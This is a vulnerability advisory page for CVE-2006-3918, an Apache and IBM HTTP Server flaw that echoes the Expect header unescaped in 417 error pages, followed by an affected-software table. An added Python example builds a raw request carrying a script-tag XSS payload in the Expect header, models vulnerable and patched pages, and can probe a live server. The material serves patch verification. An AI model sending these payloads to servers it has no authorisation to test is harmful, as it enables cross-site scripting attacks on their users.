CVE-2006-3918

Published: Jul 28, 2006 | Modified: Jun 06, 2021
Source: NVD
CVSS 3.x: N/A
CVSS 2.x: 4.3 MEDIUM (AV:N/AC:M/Au:N/C:N/I:P/A:N)

http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.

The reflection occurs in the 417 Expectation Failed response, which these servers return whenever a request carries an Expect header with any value other than 100-continue; the unpatched error page interpolates the header value into its HTML without escaping it. Exploitation is limited by the delivery vector rather than by the server: page script in a browser cannot set the Expect header, so an attacker needs a client-side component that can send arbitrary request headers on the victim's behalf (the Flash SWF case cited above). The fixed releases HTML-escape the header value before it is echoed, which is the condition to check for when verifying a patched server.
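The following is an added example, not code from this page, from NVD, or from the Apache or IBM projects. It builds the raw request that triggers the 417 response, shows a constructed model of the error page in its vulnerable form (header value interpolated verbatim) beside the escaped form the fixed releases produce, and classifies a response body as unescaped, escaped, or not reflected at all. The 417 page text, the probe payload, and the function names are assumptions made for the example; `probe_server()` needs a live host and is the only part that touches the network.

```python
"""Probe for CVE-2006-3918 style Expect-header reflection.

Added example, not code from the CVE page, NVD, Apache or IBM. The two render_*
functions are a constructed model of the 417 error page (vulnerable vs. escaped),
not Apache's own http_protocol.c; probe_server() needs a live host to talk to.
"""
import html
import socket

# Constructed XSS marker to place in the Expect header (assumption: any
# Expect value other than "100-continue" makes the server answer 417).
PROBE_PAYLOAD = "<script>alert(1)</script>"


def build_probe(host: str, path: str = "/", payload: str = PROBE_PAYLOAD) -> bytes:
    """Raw HTTP/1.1 request carrying the payload in the Expect header."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Expect: {payload}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("latin-1")


# Constructed model of the 417 page body; the placeholder is where the
# request's Expect value is echoed back to the client.
_417_TEMPLATE = (
    "<html><head><title>417 Expectation Failed</title></head><body>"
    "<h1>Expectation Failed</h1>"
    "<p>The expectation given in the Expect request-header field "
    "could not be met by this server.</p>"
    "<p>The client sent<pre>\n    Expect: {expect}\n</pre>"
    "but we only support the 100-continue expectation.</p></body></html>"
)


def render_417_vulnerable(expect_value: str) -> str:
    """Model of the unpatched behaviour: header value interpolated verbatim."""
    return _417_TEMPLATE.format(expect=expect_value)


def render_417_fixed(expect_value: str) -> str:
    """Model of the patched behaviour: header value HTML-escaped before reflection."""
    return _417_TEMPLATE.format(expect=html.escape(expect_value, quote=True))


def classify_reflection(body: str, payload: str = PROBE_PAYLOAD) -> str:
    """'unescaped' if the payload is echoed verbatim (exploitable),
    'escaped' if only an entity-encoded copy appears, 'absent' otherwise."""
    if payload in body:
        return "unescaped"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "escaped"
    return "absent"


def parse_response(raw: bytes) -> tuple[str, str]:
    """Split a raw HTTP response into (status line, body as text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status = head.split(b"\r\n", 1)[0].decode("latin-1", errors="replace")
    return status, body.decode("utf-8", errors="replace")


def probe_server(host: str, port: int = 80, timeout: float = 5.0) -> tuple[str, str]:
    """Send the probe to a live server and classify the reflection in its reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host))
        chunks = []
        while chunk := sock.recv(4096):
            chunks.append(chunk)
    status, body = parse_response(b"".join(chunks))
    return status, classify_reflection(body)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        # Live check against a host you are authorised to test.
        print(probe_server(sys.argv[1]))
    else:
        # Offline demonstration on the constructed vulnerable/fixed pages.
        for name, render in (("vulnerable", render_417_vulnerable),
                             ("fixed", render_417_fixed)):
            print(name, "->", classify_reflection(render(PROBE_PAYLOAD)))
```

Run it with a hostname to probe a server you own; with no arguments it only exercises the constructed pages. A verdict of `escaped` on a real server means the header value was entity-encoded before being echoed, which is what the fixed releases do; `absent` usually means the server did not answer 417 with a body that echoes the header at all, so it should not be read as confirmation of either state.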

Affected Software

Name | Vendor | Start Version | End Version
Http_server | Apache | 1.3 | 1.3
Http_server | Apache | 1.3.1 | 1.3.1
Http_server | Apache | 1.3.11 | 1.3.11
Http_server | Apache | 1.3.12 | 1.3.12
Http_server | Apache | 1.3.17 | 1.3.17
Http_server | Apache | 1.3.18 | 1.3.18
Http_server | Apache | 1.3.19 | 1.3.19
Http_server | Apache | 1.3.20 | 1.3.20
Http_server | Apache | 1.3.22 | 1.3.22
Http_server | Apache | 2.0 | 2.0
Http_server | Apache | 2.0.57 | 2.0.57
Http_server | Apache | 2.2 | 2.2
Http_server | Apache | 2.2.1 | 2.2.1
Http_server | Ibm | 6.0 | 6.0
Http_server | Ibm | 6.1 | 6.1
Red Hat Certificate System 7.3 | RedHat | ant-0:1.6.5-1jpp_1rh | *
Red Hat Certificate System 7.3 | RedHat | avalon-logkit-0:1.2-2jpp_4rh | *
Red Hat Certificate System 7.3 | RedHat | axis-0:1.2.1-1jpp_3rh | *
Red Hat Certificate System 7.3 | RedHat | classpathx-jaf-0:1.0-2jpp_6rh | *
Red Hat Certificate System 7.3 | RedHat | classpathx-mail-0:1.1.1-2jpp_8rh | *
Red Hat Certificate System 7.3 | RedHat | geronimo-specs-0:1.0-0.M4.1jpp_10rh | *
Red Hat Certificate System 7.3 | RedHat | jakarta-commons-modeler-0:2.0-3jpp_2rh | *
Red Hat Certificate System 7.3 | RedHat | log4j-0:1.2.12-1jpp_1rh | *
Red Hat Certificate System 7.3 | RedHat | mx4j-1:3.0.1-1jpp_4rh | *
Red Hat Certificate System 7.3 | RedHat | pcsc-lite-0:1.3.3-3.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-ca-0:7.3.0-20.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-java-tools-0:7.3.0-10.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-kra-0:7.3.0-14.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-manage-0:7.3.0-19.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-native-tools-0:7.3.0-6.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-ocsp-0:7.3.0-13.el4 | *
Red Hat Certificate System 7.3 | RedHat | rhpki-tks-0:7.3.0-13.el4 | *
Red Hat Certificate System 7.3 | RedHat | tomcat5-0:5.5.23-0jpp_4rh.16 | *
Red Hat Certificate System 7.3 | RedHat | xerces-j2-0:2.7.1-1jpp_1rh | *
Red Hat Certificate System 7.3 | RedHat | xml-commons-0:1.3.02-2jpp_1rh | *
Red Hat Enterprise Linux 2.1 | RedHat | apache | *
Red Hat Enterprise Linux 3 | RedHat | httpd-0:2.0.46-61.ent | *
Red Hat Enterprise Linux 4 | RedHat | httpd-0:2.0.52-28.ent | *
Red Hat Network Proxy v 4.2 (RHEL 3) | RedHat | jabberd-0:2.0s10-3.37.rhn | *
Red Hat Network Proxy v 4.2 (RHEL 3) | RedHat | rhn-apache-0:1.3.27-36.rhn.rhel3 | *
Red Hat Network Proxy v 4.2 (RHEL 3) | RedHat | rhn-modperl-0:1.29-16.rhel3 | *
Red Hat Network Proxy v 4.2 (RHEL 4) | RedHat | jabberd-0:2.0s10-3.38.rhn | *
Red Hat Network Proxy v 4.2 (RHEL 4) | RedHat | rhn-apache-0:1.3.27-36.rhn.rhel4 | *
Red Hat Network Proxy v 4.2 (RHEL 4) | RedHat | rhn-modperl-0:1.29-16.rhel4 | *
Stronghold 4 for Red Hat Enterprise Linux | RedHat | stronghold-apache | *
Apache | Ubuntu | dapper | *
Apache | Ubuntu | edgy | *
Apache | Ubuntu | feisty | *
Apache2 | Ubuntu | dapper | *
Apache2 | Ubuntu | devel | *
Apache2 | Ubuntu | edgy | *
Apache2 | Ubuntu | feisty | *
Apache2 | Ubuntu | gutsy | *
Apache2 | Ubuntu | hardy | *
Apache2 | Ubuntu | intrepid | *
Apache2 | Ubuntu | jaunty | *
Apache2 | Ubuntu | karmic | *

References